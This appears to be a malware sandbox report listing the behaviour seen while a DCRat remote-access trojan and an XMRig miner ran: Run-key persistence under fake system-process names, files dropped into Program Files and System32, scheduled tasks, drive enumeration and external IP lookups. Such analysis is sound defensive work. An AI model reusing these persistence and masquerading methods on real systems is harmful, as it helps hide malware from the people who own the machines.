Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

xmrig

miner xmrig

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Event Triggered Execution: AppInit DLLs

persistence privilege_escalation

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\DriversavessessionDlldhcp\Roblox.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Result.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\cmd.exe N/A
N/A N/A N/A N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\Windows\system32\wbem\WmiApSrv.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\winNet\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Public\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\All Users\\Templates\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\winNet\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Public\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Recovery\\WindowsRE\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Recovery\\WindowsRE\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\All Users\\Templates\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSCEDEE80FABE974800B5DBB2ADA3AD378B.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\sobql9.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Microsoft Office\Office16\services.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\ModifiableWindowsApps\spoolsv.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\7-Zip\Lang\a0b1fd4c5438e9 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Sidebar\TextInputHost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\TextInputHost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files\Microsoft Office\Office16\services.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\Windows NT\TableTextService\en-US\conhost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\Windows NT\TableTextService\en-US\conhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows NT\TableTextService\en-US\088424020bedd6 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\7-Zip\Lang\Refcrt.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Google\33f6b6f444b053 C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files\Windows NT\TableTextService\en-US\CSCCF1AAFE95DF4408AFAA786A37D33121.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\7-Zip\Lang\Refcrt.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files (x86)\Google\ComContainerbrowserRefRuntime.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files\7-Zip\Lang\CSC6C23FC88DE514248B2B06EB9A779747D.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\Microsoft Office\Office16\c5b4cb5e9653cc C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Sidebar\22eafd247d37c3 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files\Microsoft Office\Office16\CSC13CEFDF3D78F44CBB74210E0B4722E24.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\Windows Sidebar\CSC4DA05245C94C4B5D9D4CDA48E3EE2C5B.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\Windows Sidebar\TextInputHost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\e57d11b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57d11b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF08F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID34E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE7A4.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\CSC\spoolsv.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
File opened for modification C:\Windows\Installer\MSIF05F.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID38D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID39E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\DriversavessessionDlldhcp\Roblox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
